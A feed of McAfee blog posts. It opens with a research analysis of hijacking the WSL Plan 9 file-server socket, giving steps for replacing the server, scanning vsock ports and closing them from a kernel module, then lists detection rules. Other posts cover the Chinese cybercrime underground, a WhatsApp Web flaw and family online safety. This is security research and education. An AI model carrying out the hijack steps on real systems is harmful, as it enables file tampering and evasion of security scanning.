McAfee Blogs https://www.mcafee.com/blogs Securing Tomorrow. Today. Tue, 11 Feb 2020 23:57:23 +0000 en-US hourly 1 https://wordpress.org/?v=5.3.2 https://www.mcafee.com/wp-content/uploads/2018/11/cropped-favicon-32x32.png McAfee Blogs https://www.mcafee.com/blogs 32 32 Knock, Knock – Who’s There? https://www.mcafee.com/blogs/other-blogs/mcafee-labs/knock-knock-whos-there/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/knock-knock-whos-there/#respond Tue, 11 Feb 2020 15:40:35 +0000 /blogs/?p=98542

A Windows Linux Subsystem Interop Analysis Following our research from Evil Twins and Windows Linux Subsystem, interoperability between different WSL versions was something that caught our attention. The protocol and mechanism to do file management from/to WSL is a must for Blue and Red Teams whose research will provide new ways to execute known techniques […]

The post Knock, Knock – Who’s There? appeared first on McAfee Blogs.

]]>

A Windows Linux Subsystem Interop Analysis

Following our research from Evil Twins and Windows Linux Subsystem, interoperability between different WSL versions was something that caught our attention. The protocol and mechanism to do file management from/to WSL is a must for Blue and Red Teams whose research will provide new ways to execute known techniques to achieve tactics such as Persistence, Defense Evasion and Execution, among others.

It is important (even if not seen today in regular arsenals) to understand how to protect, detect and react to this attack surface which could be widely spread in the future where WSL could be a de-facto component in every Enterprise machine.

Since Windows 10 version 1903, it is possible to access Linux files from Windows by using the \wsl$[DistroName] path syntax using 9P protocol. During our research, we found some design issues in WSLv1 that were propagated to WSLv2 — even though the core component differs. The main issue involves the lack of security control in the WSL communication object, leading to any user owning the instance to own the listening Planet 9 File System server. At first sight, this may look obvious, but once you control that communication, different ways of using the data being sent back and forth from Windows to the container begin to emerge.

It is important to mention that when running inside an isolated environment like WSLV2, certain activities not crossing boundaries may remain hidden for security products, but once an attempt to execute a malicious app on the Windows side is detected, the scanning mechanism provided by MVISION Endpoint and ENS will trigger to protect. MVISION EDR will provide visibility and detection on some of these artifacts. At the end of this article, we present certain objects to monitor to detect such cases in your organization.

Potential usages for Red Teams and  Researchers:

  • Persistence by hiding the real content, especially on WSLv2 where the root folder is a VHDX image.
  • Protocol fuzzing for discovering vulnerabilities on the implementation.
  • Security bypass by using \\wsl$ syntax in applications that have options to disable Network Folders scan and thus, do not consider this as a local path. (McAfee MVision Endpoint will consider this special path).
  • File tampering (the user accesses a file expecting some content, but it is changed during the transfer).

P9 Server Hijack Pre-Requisites:

  • WSL Enabled
  • Same user privileges as the WSL instance
  • A P9 compatible server

In the following section P9 (Planet 9 File System Protocol) and 9P (the protocol) are used interchangeably

WSLv1 and P9

The communication is done using an AF_UNIX socket (local file) that is currently owned by the user executing the WSL instance. The socket is created by the custom init process. Processes from the Windows side use a p9driver to access that socket by using an implementation of the P9 FileSystem instead of accessing the files as “Windows local”.

Note: Plan 9 has several implementations; currently the format supported by Windows is L / W.

A simple string on init shows that:

  1. The first WSL instance will open the p9 server for that distribution.
  2. Init has an embed server that creates a Unix socket into the distro path.
  3. The Unix socket is used to communicate.
  4. Whenever \\wsl$\ is accessed, P9 driver starts the communication.
  5. A P9 client communicates with the server.

Now, is that fsserver file protected? No! That means that we can hijack that socket and start our P9 server (in this case, I used DIOD as the main source) and from there… the options are endless from protocol fuzzers to trigger something unexpected, to protection bypass, to something very simple that just serves different content than expected.

To find programmatically the fsserver root location using PowerShell:

From there, the next step would be to start our p9 server from WSL (assuming the path was provided as the script argument as shown above):

In this example, next time we access \\wsl$\Debian, it will serve the files from mynewroot.

The below screenshot shows the full procedure using a modified P9 server:

  1. DIOD listening on the local socket.
  2. WSL directory listing before the hijack.
  3. WSL directory listing after the hijack.

At the time we were working on this, WSLv2 was announced and available in the latest Win10 Update. The next question was obvious—can we still do the same, given that the instance is now hosting a real kernel due to its nature of being hosted as a Hyper-V internal instance?

WSLv2 and P9

Now that there is a Linux Kernel the real “p9 Linux” module is activated. C: drive is mounted using P9 with several rdfd/wdfd arguments on top of drvfs.

The host is at CID:2, and ports  50000/1/2 are used for InterOp Messages and instance control.

Back to work — there are some steps to follow to determine whether we can achieve the same P9 Server Hijack or not.

  • Scan open ports listening on WSLv2 instance (a starting point could be modifying sample client code to became a scanner).
  1. Find the instance UID (an option is to check the task manager and wslhost.exe command line).
  2. Scan the instance!

3. Hey! Port 0x405(1029d) is open, let us Knock-Knock to find who is there.

  • P9 server port found… let us go hijack!!!
    1. Listening to the same port as with WSLv1 is not possible , unless we find a way to bypass the restrictions (app/module not using reuseaddr/port, not possible to close from user-space, etc.).
    2. We cannot kill init nor unload the module serving the files, so our best bet would be to close the port from the kernel. At the end of the day, it is our instance and we login as root .
    3. Let us create a vsock module that will:
      1. List current vsock connected sockets.
      2. Close a socket listening on a certain port.

  1. Compile the module using kernel source.
  2. Test it! (Note that same ports are not present and should be fixed, but for what we want the output is enough).

3)   Now, we are free to go, but still, we need to start our P9 DIODserver listening somehow on that port using a VSOCK socket. Since `socat` supports this type of socket it will be a piece of cake.

  • Access \\wsl$\DistributionName and voila!

Protection and Detection with McAfee Products

In Addition to rules related to WSL presented in previous posts, McAfee products provide several ways to detect and protect against P9 hijacking:

  • MVISION Endpoint will scan \\wsl$\ even if network scanning is disabled, so from the execution perspective on Windows side protection will still apply.
  • By using Endpoint Security Expert Rules it’s possible to block execution from WSL paths.
  • To configure Active Response (WSLv1) follow the below steps:
    • Setup a trigger to be notified of this situation a file fsserver is deleted.
      • File Trigger with condition: Files name equals fsserver”
    • Files collector if enabled, looking for fsserver modifications.
      • “Files where Files name equals fsserver”

In MVISION EDR (WSLv1), the file collector should be enabled and looking for wsl.conf modifications (files where files name equals “fsserver”

As a final note, we expect this post to provide new insights about the future exploration of these key areas, mostly considering that WSLv1 and WSLv2 can be converted online and both versions will be fairly used during the next years.

References:

  1. http://doc.cat-v.org/plan_9/misc/ubiquitous_fileserver/
  2. http://9p.io/magic/man2html/5/intro
  3. https://github.com/chaos/diod/blob/master/protocol.md
  4. https://w4mhi.wordpress.com/complete-hyper-v-socket-client-code/
  5. https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service
  6. https://tyranidslair.blogspot.com/2019/07/digging-into-wsl-p9-file-system.html
  7. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/
  8. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/the-twin-journey-part-1/

 

The post Knock, Knock – Who’s There? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/knock-knock-whos-there/feed/ 0
How Chinese Cybercriminals Use Business Playbook to Revamp Underground https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-chinese-cybercriminals-use-business-playbook-to-revamp-underground/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-chinese-cybercriminals-use-business-playbook-to-revamp-underground/#respond Tue, 11 Feb 2020 05:01:33 +0000 /blogs/?p=98437

Preface Because of its longevity and technical sophistication, the Russian cybercriminal underground has long been the benchmark for threat researchers focused on studying cybercrime tactics and techniques; there is a plethora of publications dedicated to analyzing its economy and hacking forums. However, only a handful of studies have centered on the emerging threats and trends […]

The post How Chinese Cybercriminals Use Business Playbook to Revamp Underground appeared first on McAfee Blogs.

]]>

Preface

Because of its longevity and technical sophistication, the Russian cybercriminal underground has long been the benchmark for threat researchers focused on studying cybercrime tactics and techniques; there is a plethora of publications dedicated to analyzing its economy and hacking forums. However, only a handful of studies have centered on the emerging threats and trends from other, less prominent, cybercriminal undergrounds.

Recent data shows that the Chinese cybercriminal underground’s profits exceeded US$15.1 billion in 2017, while causing more than $13.3 billion worth of damage relating to data loss, identity theft and fraud. Over the years, the McAfee Advanced Programs Group (APG) has observed Chinese non-state threat actor groups gradually transform from small local networks targeting mostly Chinese businesses and citizens to large, well-organized criminal groups capable of hacking international organizations.

The development of commercial-scale exploit toolkits and criminal networks that focus on monetization of malware have amplified the growing risks of cybercrime in the Asia Pacific region to include a DDoS attack against the People’s Bank of China in December 2013, a $1 billion SWIFT hack against Bangladesh Bank in February 2016 and a $60 million theft from Far Eastern International Bank in Taiwan in October 2017, to name just a few.

This blog provides a rare glimpse inside the Chinese cybercriminal underground. Analyzing its current business models and techniques has yielded insights into the drastic changes in its operations, including the tactics and strategies it is borrowing from Russian cybercriminals.

Timeline: The Rise of the Chinese Cybercriminal Underground

China established its first cable connection to the world wide web in 1994, around the same time as cybercrime syndicates from Russia and other emerging cybercriminal undergrounds were executing their first major cybercrimes. Chinese leaders have since prioritized the development and acceleration of Internet technologies and, today, the size of China’s Internet use is massive and unparalleled at 800 million users.

However, this growth in Internet usage is not without irony as it has been accompanied by a significant increase in cybercriminal activity. Despite the Chinese government placing high importance on running one of the world’s most sophisticated Internet censorship systems, local cybercriminals are finding workarounds that contribute to China having one of the fastest growing cybercriminal underground economies.

China’s cybercrime enterprise is large, lucrative and expanding quickly. According to 2018 Internet Development Statistics, China’s cybercriminal underground was worth more than US $15 billion, nearly twice the size of its information security industry. The same Chinese-language source also shows that China’s cybercrime is growing at a rate of more than 30 percent a year. An estimated 400,000 people work in underground cybercriminal networks.

Changes in Tactics, Techniques and Procedures

In order to quickly scale up their businesses and maximize return on investment (ROI), Chinese cybercriminals have continuously adapted their tactics, techniques and procedures (TTPs). One significant change is that Chinese cybercriminals are slowly moving away from a high degree of one-to-one engagement through China’s popular QQ instant messaging platform to now establishing more formal cybercriminal networks. These networks use centralized advertising and standard service processes similar to Russian and other more sophisticated cybercriminal underground forums. Cybercriminals can access these centralized networks hosting on the deep web to post their products and services. A large amount of stolen data is available via automated services, where carders can order the credit and debit card information they want without having to interact with another user. With regard to hacking services, Chinese cybercriminals also offer modules for prospective clients to fill out their service requests, including types of attacks, target IP addresses, desirable malware or exploit toolkits and online payment processing. Through establishing a standardized model of sale, Chinese cybercriminals can expand their activity quickly without incurring additional overhead costs.

Attacks-as-a-service

Similar to other prominent cybercrime underworlds, Chinese cybercriminal underground markets are focused on providing excellent customer service. Many of the hackers expand their working hours to include weekends and even provide 24/7 technical support for customers who do not have a technical background. Distributed Denial of Service (DDoS) botnets, traffic sales, source code writing services, email/SMS spam and flooding services are available on the Chinese black markets.

Despite government censorship, a small number of Chinese cybercriminals still use dark web marketplaces to offer their services and products. Those marketplaces are typically specialized in the commercialization of stolen personally identifiable information (PII), bank accounts with high balances, hacking services, and malware customization. However, these darknet markets or hacking forums are not easily accessible because the Chinese government blocks the Tor anonymity network. A large number of Chinese cybercriminals continue to use exclusive and opaque QQ groups, Weibo fora and Baidu Teiba for advertising and communication. Chinese cybercriminals are also active on the clearnet. To avoid government censors and crackdowns, Chinese cybercriminals extensively use slang or other linguistic tactics for communication and advertising, which can be difficult for outsiders to comprehend. For instance, Chinese cybercriminals call a compromised computer or server “chicken meat.” Stolen bank accounts, credit card passwords, or other hijacked accounts are referred to as either “letters” or “envelopes.” Malicious websites and email accounts used for credential phishing attacks or spamming are referred to as “boxes.” Stolen information or details stored in the back of the magnetic stripe of a bank card are referred to as “data”, “track material” or simply “material.”

Moving Operational Base Abroad

Another noticeable trend is that an increasing number of Chinese cybercriminal gangs are moving their operational base abroad, using cryptocurrencies to launder money. They appear to prefer countries and jurisdictions with weak cybercrime legislation or weak enforcement, such as Malaysia, Indonesia, Cambodia and the Philippines. Since 2017, China’s Ministry of Public Security has uncovered over 5,000 cases of cross-border telecommunication fraud involving more than US $150 million. Some of the cybercriminal groups are highly structured and work as traditional mafia-like groups that engage delinquent IT professionals; some Chinese cybercrime gangs are well-structured with clear divisions of labor and multiple supply chains. Members are typically located in close geographic proximity, even when the attacks are transnational.

Unique Culture and Practices

Chinese hackers employ different payment methods, recruiting strategies, and operating structures from other cybercriminal undergrounds. AliPay and bank transfers are the generally accepted payment methods advertised by Chinese-language hacking forums; many other forums typically prefer Monero and Bitcoin.

The “Master-Apprentice Mechanism,” which is a form of mentorship, plays a significant role in the Chinese hacking communities. Many Chinese hacker groups utilize the strategy to recruit new members or make profits. As shown in the following graph, QQ hacking group masters, usually masterminds of an organized crime group or an administrator of a hacking community, collect training fees from the members they recruit. These members, known as “apprentices” or “hackers-in-training” are required to participate in multiple criminal “missions” before they complete the training programs. Once training is complete, they are eligible to upgrade to full-time hackers working for their masters and responsible for downstream operations, such as targeted attacks, website hacking and database exfiltration.

Figure 2: Master-Apprentice Mechanism (Source: Author)

Growth of Chinese Cybercrime

The Chinese cybercriminal underground has gone through drastic changes over the years. It gradually transformed from small local networks, targeting mostly Chinese businesses or citizens, to larger and well-organized criminal groups capable of hacking international organizations. My research indicates that there has been a growing threat activity targeting individuals and organizations in South Korea, Taiwan, Singapore, Germany, Canada and the United States. Chinese cybercriminals offer a wide variety of goods and services, ranging from physical counterfeit of US and Canadian driver’s licenses, scans of counterfeit US and Canadian driver’s licenses, US cell phone numbers, credit cards and identification cards to stolen social media and email accounts.

Figure 3: Growth of Chinese cybercrime (Source: Author)

As shown in the following screenshots, 1 million stolen US emails accounts with encrypted passwords are selling for US $117; 1.9 million stolen German email accounts with clear text passwords are available on the Chinese black market for US $400. Counterfeit or scans of US or Canadian passports or drivers licenses are also for sale for as little as US $13.

Figure 4: 1 million US email accounts with encrypted passwords are for sale in the Chinese cybercriminal underground
Figure 5: 1.9 million stolen German email accounts with clear text passwords are for sale in the Chinese cybercriminal underground
Figure 6: Chinese cybercriminals sell physical counterfeit of Canadian driver’s licenses

As shown in the following screenshot, Chinese hackers are also selling stolen personal data, including identification cards and passports from Taiwan and South Korean citizens.

Figure 7: Stolen PII from Taiwanese citizens, including national identification numbers, physical addresses, cell phone numbers, etc. are for sale in the Chinese cybercriminal underground
Figure 8: Chinese hackers selling 17 million South Korean national identification numbers

Login credentials for banks around the world are available on the Chinese cybercriminal underground market, and the higher the available balance of an account, the higher its selling price. Packages of hacked accounts from major US social media companies and networking platforms, gaming service providers, as well as media service providers are sold for as little as US $29 in the underground cybercrime market. These social media accounts are sometimes hacked with the intention of using them as a way to generate fake accounts to ensnare even more web users. A large number of email accounts from Taiwanese (i.e., @yahoo.com.tw) and South Korean email service providers (i.e., @nate.com, @yahoo.com.kr) are being sold on the Chinese black market.

Increasingly Difficult to Separate Cybercrime From Cyberespionage Activity

As the Chinese cybercriminal underground quickly expands its scope and sophistication, it is increasingly difficult to separate cybercrime from cyber espionage activity. This is especially true as I observe that Chinese cybercriminals offer services to spy on businesses and sell commodities that can be used to target businesses or government officials for economic and political espionage purposes. One of the most interesting items I found for sale in the Chinese cybercriminal underground is a full business dossier on Chinese companies and government agencies. Some Chinese hackers sell internal employee directories from high-profile technology companies. Chinese cybercriminals appear to work with malicious insiders or hire hackers to work as undercover agents inside of telecommunications service providers, financial services and technology companies to steal company secrets or other proprietary information. Documents include detailed contact information of CEOs and senior management from China’s top 50 companies. Other business proprietary information, such as credentials associated with a company’s various bank accounts, funding history, marketing strategies, and Tax Identification Number (TIN) are also available for sale on the black market. Malicious actors can use the above-mentioned information to launch targeted attacks against a business or leverage third-party vulnerabilities, such as trusted financial services, staffing firms and IT service providers to infiltrate a target system.

Conclusion

China’s cybercrime networks are rapidly growing in scope and sophistication. Compared to my earlier research paper on China’s cybercriminal underground from three years ago, Chinese cybercriminals have begun to embrace a sophisticated business-model approach and develop complex hierarchies, partnerships and collaboration with cybercriminal groups at home and internationally. These globally operating and organized cybercrime networks are basing themselves in countries with weak legal systems and law enforcement, while taking full advantage of global Internet connectivity to attack targets worldwide. A growing number of Chinese cybercriminals from these networks leverage the deep web to host their infrastructure and sell illegal goods and services, instead of relying on traditional peer-to-peer engagement through the QQ platform. To accelerate profitability, the Chinese hacking community has adopted tactics and techniques similar to Russian and other prominent cybercriminal underground markets to become more structured and service-oriented. In contrast, the Russian cybercriminal networks have been known for their multi-faceted criminal organizational structure specialized in monetizing PII theft and financial fraud. Yet, China’s cybecriminal underground, on the other hand, has placed greater emphasis on community and discipleship in achieving financial gains. Many of China’s cybercriminal networks incorporate this discipleship, also known as the “master-apprentice mechanism”, into a recruiting strategy that is largely different from their Russian counterparts. As China’s cybercrime continues to evolve and advance, international organizations operating in the Asia Pacific region are facing an expanding threat landscape from cybercriminal activity targeting high-value business assets. Intellectual property and identity theft can also cause substantial economic consequences.

The post How Chinese Cybercriminals Use Business Playbook to Revamp Underground appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-chinese-cybercriminals-use-business-playbook-to-revamp-underground/feed/ 0
Intelligence in the Enterprise https://www.mcafee.com/blogs/other-blogs/mcafee-labs/intelligence-in-the-enterprise/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/intelligence-in-the-enterprise/#respond Tue, 11 Feb 2020 05:01:13 +0000 /blogs/?p=98435

Intelligence became an integral military discipline centuries ago. More recently, this practice evolved into what is called Intelligence Preparation of the Battlefield, or IPB. In both military and civilian agencies, the discipline uses information collection followed by analysis to provide guidance and direction to operators making tactical or organizational decisions. Used strategically, this type of intelligence puts an organization in […]

The post Intelligence in the Enterprise appeared first on McAfee Blogs.

]]>

Intelligence became an integral military discipline centuries ago. More recently, this practice evolved into what is called Intelligence Preparation of the Battlefield, or IPB. In both military and civilian agencies, the discipline uses information collection followed by analysis to provide guidance and direction to operators making tactical or organizational decisions. Used strategically, this type of intelligence puts an organization in a stronger position to operate offensively or defensively because in theory, they now know more than their enemy.

This same concept can be applied in the theater of cybersecurity operations. However, the current scope of intelligence in many enterprises describes just one aspect of the IPB discipline: information collection. The critical component missing to complete the process is a specialized researcher trained in this type of analysis and subsequent application of intelligence.

A disciplined intelligence cycle goes deep—applying advanced data collection methodologies from open, closed and propriety sources, social media, human intelligence and the dark web against areas such as cybercrime, hactivism, or cyber espionage to thoroughly analyze the adversary. Intelligence can ultimately be used to prepare organizations tactically and strategically to both anticipate and mitigate modern threats.

The latest research and analysis from McAfee Advanced Program Group (APG) researcher Anne An detailing the actions of Chinese non-state threat actor groups is a great example of intelligence that is invaluable for organizations. This unique take on Chinese cyber criminality educates practitioners on the threats around them, empowering them to prepare their organization to be proactive, rather than reactive. Further, there are many times where organizations are unaware they have been a victim of a cyberattack. This could include stolen data, which McAfee APG may find being sold on the dark markets, and in some cases, could have a devastating effect on their business.

Sun Tzu, the Chinese general, and military strategist once articulated, “The art of war teaches us to rely not on the likelihood of the enemy’s not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.”  These ancient words are still very meaningful today. If organizations robustly embrace the intelligence process, their defensive posture will exponentially improve.

 

The post Intelligence in the Enterprise appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/intelligence-in-the-enterprise/feed/ 0
Safer Internet Day 2020 https://www.mcafee.com/blogs/consumer/safer-internet-day-2020/ https://www.mcafee.com/blogs/consumer/safer-internet-day-2020/#respond Mon, 10 Feb 2020 23:40:44 +0000 /blogs/?p=98538

What Can You Do To Make The Internet a Better Place In 2020, you’d be hard-pressed to find an Aussie teen who doesn’t spend a fair whack of their time online. And while many of us parents don’t always love the time our offspring spend glued to screens, most of us have come to accept […]

The post Safer Internet Day 2020 appeared first on McAfee Blogs.

]]>

What Can You Do To Make The Internet a Better Place

In 2020, you’d be hard-pressed to find an Aussie teen who doesn’t spend a fair whack of their time online. And while many of us parents don’t always love the time our offspring spend glued to screens, most of us have come to accept that the online world is a big part of our kids’ lives.

So, let’s accept that the internet is going to be a feature of our kids’ lives and work out how best we can keep them safe.

Together For A Better Internet

Today is Safer Internet Day  – an international annual event that encourages us all to work together for a better internet. The perfect opportunity to find out what we can do as parents to ensure our kids are as safe as possible online.

Organised by the joint Insafe/INHOPE network, with the support of the European Commission, Safer Internet Day is held each February to promote the safe and positive use of digital technology, especially among children and young people. Safer Internet Day is all about inspiring users to make positive changes online, to raise awareness of online safety issues, and participate in events and activities right across the globe.

What Can We Do As Parents?

As role models and life-educators, parents play an enormous role in shaping our kids’ behaviours and opinions – particularly before they get to the teenage years!! So, why not use Safer Internet Day as a prompt to freshen up your cybersafety chats with your brood.

Not sure where to start? Here are my top messages to weave into your chats with your kids

  1. Be Kind Online

Spread love not hate online. A better internet includes building an online culture where people share positive and encouraging posts and comments. It may be as simple as posting a positive message, liking a post that is encouraging or sharing an inspiring article. Image

It may sound obvious but before you post a comment or a tweet, ask yourself whether the message could offend someone or impact them negatively. And remember to NEVER like, favourite, retweet, post or comment negatively online.

  1. Learn How To Disagree Respectfully Online

No matter how much we try, there will always be some people online who get a kick out of being unkind. If you come across this behaviour, I encourage you to call it out and report it but ALWAYS do so in a respectful fashion. Reciprocating with harsh words or name-calling will only further inflame a toxic situation. A logical, factual response that is respectful will always triumph!

  1. Protecting Your Online Reputation (& Others Too)

If you’re planning on hiring someone or even going on a date with someone, the chances are you’re going to ‘Google’ them first. And what you find online and the opinion you form decides whether the person’s digital reputation is acceptable or not.

So, it’s essential to remember that everything you post online is permanent and public; not to post inappropriate comments or pics of yourself or others; ensure all your online profiles are set to private to avoid strangers ‘screen-grabbing’ your private info and photos; don’t respond to inappropriate requests and most importantly, take a breather when things are getting heated online and you may regret your comments and actions.

  1. Passwords!!!!!

Managing passwords is one of the best ways of taking control of your online life and creating a better internet. Ensuring you have a separate password for every online account means that if you are affected by a data breach, your other online accounts are not at risk. Always choose passwords that have letters, numbers and symbols and ensure they are complex and not obvious. I love using a nonsensical sentence! And if all that’s too hard, why not consider a password manager that not only creates complex passwords for each of your online accounts but remembers them too. All you need to do is remember the master password! Awesome!!

So, why not pledge to change up your cybersafety chats with your kids this Safer Internet Day? And remember – they are watching you too! So, ensure you always model online respect, take your online responsibilities seriously and, also manage your passwords carefully. Because every little step is a step towards a positive change.

 

 

 

 

 

 

The post Safer Internet Day 2020 appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/safer-internet-day-2020/feed/ 0
WhatsApp Users: Secure Your Desktop With These Tips https://www.mcafee.com/blogs/consumer/consumer-threat-notices/whatsapp-desktop-vulnerabilities/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/whatsapp-desktop-vulnerabilities/#respond Mon, 10 Feb 2020 22:46:07 +0000 /blogs/?p=98529

With over 500 million daily active users, WhatsApp is one of the world’s most popular messaging platforms. In an effort to provide even more ways to connect beyond iOS and Android, WhatsApp introduced a desktop version of the app in 2016, which allowed users to stay in touch from their home or work computer. However, […]

The post WhatsApp Users: Secure Your Desktop With These Tips appeared first on McAfee Blogs.

]]>

With over 500 million daily active users, WhatsApp is one of the world’s most popular messaging platforms. In an effort to provide even more ways to connect beyond iOS and Android, WhatsApp introduced a desktop version of the app in 2016, which allowed users to stay in touch from their home or work computer. However, a researcher from The Hacker News recently disclosed multiple vulnerabilities in WhatsApp which, if exploited, could allow remote attackers to compromise the security of billions of users.

How safe is WhatsApp?

According to researcher Gal Weizman, the flaws were found in WhatsApp Web, the browser version of the messaging platform. Weizman revealed that WhatsApp Web was vulnerable to an open-redirect flaw, which allows remote hackers to redirect victims to suspicious, arbitrary websites. If a hacker sent an unsuspecting victim a message containing one of these arbitrary links, they could then trigger cross-site scripting attacks. These attacks are often found in web applications and can be used by hackers to bypass access controls by injecting malicious code into trusted websites.

WhatsApp Web hack

If the victim clicks on the link in the message, the hacker could remotely gain access to all the files from their Windows or Mac computer, which increases the risk for identity theft. What’s more, the open-redirect flaw could have also been used to manipulate previews of the domain WhatsApp displays when links are sent through their platform. This provides hackers with another avenue to trick users into falling for phishing attacks.

 

How to stay safe

How can users continue to use messaging platforms like WhatsApp without putting themselves at risk of an attack? Follow these security tips for greater peace of mind:

  • Update, update, update. If you’re a WhatsApp Web user, be sure to update to the latest version to install the security patch for this flaw.
  • Think before you click. Be skeptical of ads shared on social media sites and messages sent to you through platforms like Facebook, Twitter, and WhatsApp. If you receive a suspicious message from an unknown sender, it’s best to avoid interacting with the message.
  • Hover over links to see and verify the URL. If someone you don’t know sends you a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post WhatsApp Users: Secure Your Desktop With These Tips appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/whatsapp-desktop-vulnerabilities/feed/ 0
Cloud Security is like Renting a Car! https://www.mcafee.com/blogs/enterprise/cloud-security/cloud-security-is-like-renting-a-car/ https://www.mcafee.com/blogs/enterprise/cloud-security/cloud-security-is-like-renting-a-car/#respond Mon, 10 Feb 2020 15:35:25 +0000 /blogs/?p=98497

Cloud security has many aspects and it is easy to miss the scale of the issue by taking a simple view.  For example, people may trust a particular cloud service provider and think that all security responsibility belongs to them, some people just look at the technical aspects (is data encrypted) or certifications (do they […]

The post Cloud Security is like Renting a Car! appeared first on McAfee Blogs.

]]>

Cloud security has many aspects and it is easy to miss the scale of the issue by taking a simple view.  For example, people may trust a particular cloud service provider and think that all security responsibility belongs to them, some people just look at the technical aspects (is data encrypted) or certifications (do they conform to ISO 27xxx) or forget the human aspect – sadly, any of these viewpoints can mean insecure cloud use and data loss for the company.

To explain the breadth of securing cloud, we have created a new white paper “The Cloud Security 3600 Shared Responsibility Model” that splits cloud security requirements into nine areas and discusses how to ensure each different area is being addressed.

In other areas of life, we also have a shared responsibility, even if it is usually seamless and so we don’t think about it much, for example when renting a car.

Firstly, when the car is new the manufacturer has the responsibility that it is roadworthy; has good brakes and tires, the airbags work and it’s not going to fall apart at the first corner. During the lifetime, the rental company and the renter are hopefully not going to test the airbags, they just assume that they will work as originally installed.

Once the car gets older, the owner (the rental company) is responsible for checking the tires, the brakes, servicing the car and keeping it roadworthy, the renter simply assumes that this is the case. The renter needs to have the appropriate driving license for the vehicle, this is checked by the rental company before the car is handed over.

The car includes seat belts, installed by the manufacturer, but it is the driver’s responsibility to wear their own, and ensure that all the family members wear them too. For young children, it is the driver’s responsibility to ensure that they have appropriate child seats and for the older kids, the parent has to ensure that they do not take off their seat belt.

General insurance is shared between the rental company and the renter (who, perhaps isn’t the only driver). Ultimately, the driver is responsible for driving the car appropriately for the conditions, driving more slowly in rain and snow and not speeding around corners.

Renting a car safely is a responsibility where five groups of people all have their part to play: car manufacturer, rental company, renter, passengers and the driver.  If one area is ignored, there could be an accident with tragic consequences, and it is no good saying “but I checked the other areas” – all need to be considered together.

Cloud computing is similar – you are not safe just because the cloud service provider has invested a lot in security. You are not safe just because you have anti-malware systems installed.  The service provider, enterprise, IT security team and user all have a part to play and if any one of the areas are not addressed, then security is compromised.

Cloud computing needs to be considered across each row of the diagram. The cloud service provider is responsible for the lowest levels of security (power, connectivity, server infrastructure etc.), and provides some security functions, but the enterprise is responsible for turning these on (for example think of the number of data loss incidents caused by misconfigured S3 buckets), only the enterprise can truly decide which data is confidential, while it is users who typically decide to share and collaborate via the cloud with external parties.

The paper discusses all of this in detail and suggests ideas and technologies to address each roe – just like renting a car, you need to address every row to be secure.

 

 

The post Cloud Security is like Renting a Car! appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/cloud-security-is-like-renting-a-car/feed/ 0
7 Conversations to Help Build Up Your Family’s Digital Literacy Skills https://www.mcafee.com/blogs/consumer/family-safety/7-conversations-to-help-develop-your-familys-digital-literacy-iq/ https://www.mcafee.com/blogs/consumer/family-safety/7-conversations-to-help-develop-your-familys-digital-literacy-iq/#respond Sat, 08 Feb 2020 17:00:27 +0000 /blogs/?p=98506 Digital Literacy

With the surge of misleading content online, helping your child learn to become an independent thinker is no small task. While schools have been charged with developing students’ digital literacy skills, parents also have a role in consistently sparking deeper thinking when navigating digital environments. The sharper a child’s digital literacy skills, the more quickly he […]

The post 7 Conversations to Help Build Up Your Family’s Digital Literacy Skills appeared first on McAfee Blogs.

]]>
Digital Literacy

With the surge of misleading content online, helping your child learn to become an independent thinker is no small task.

While schools have been charged with developing students’ digital literacy skills, parents also have a role in consistently sparking deeper thinking when navigating digital environments.

The sharper a child’s digital literacy skills, the more quickly he or she can identify biased agendas and deceptive content and form thoughts, insights, and opinions independently of the digital crowd think.

Here are a few conversations to focus kids on building up digital literacy skills.

7 conversations to build digital literacy skills

  1. Grow visual literacy. The world expresses itself through media today, which makes visual literacy (the ability to interpret art and media content) another must-have skill for kids. According to recent reports, Snapchat has 10 billion video views a day, Facebook video 8 billion views a day, YouTube video 5 billion views. Instagram reports its users upload 25 million photos every day. This visual tsunami increases the chances your child will encounter deep fakes (AI-enhanced video), malicious memes (false information placed on photos) designed to manipulate public opinion. Discuss: Learn ways to spot deep fakes with your kids (stray hairs, no blinking, eye movement, etc.). Additional resource: Watch and discuss this video and read the post Can You Spot a Deepfake? from LifeHacker with your family.
  2. Search with care. Search engines scan the web and bring up relevant content. However, not all that content is credible. Understanding a search engine’s function is essential, especially when your child is researching a paper and evaluating other content. Search engines rank by keywords, not content accuracy. Ask: Is this content credible and supported by legitimate sources? Is it presented as humor or an opinion piece? Is the URL authentic and trustworthy? Additional Resource: Common Sense Media’s video Smart Online Search Tips.
  3. Protect, respect privacy. Kids, fueled by emotion and impulse, often move around online with little thought to personal privacy or the privacy of others. Discuss: Talk about the basics often: Where are the privacy gaps in our technology? Where are there privacy gaps in my behavior? How can we create strong passwords? Are my privacy settings current? Do I have personal details in public view, either on profile info or in my posts? The other side of privacy: Respect friends’ privacy by asking permission to post photos, keeping personal secrets, and never sharing personal details or circumstances of another person in the online space.
  4. Recognize and respect points of view. The web is a big place with an ocean filled with different points of view. Part of becoming digitally literate is learning how to listen to and respect the opinions of others. Exercising this skill is essential to building empathy, eliminating cyberbullying and online shaming, and becoming a positive voice in the online space. Additional resource: Discuss Dr. Michele Borba’s blog post, 9 Habits of Empathetic Children.
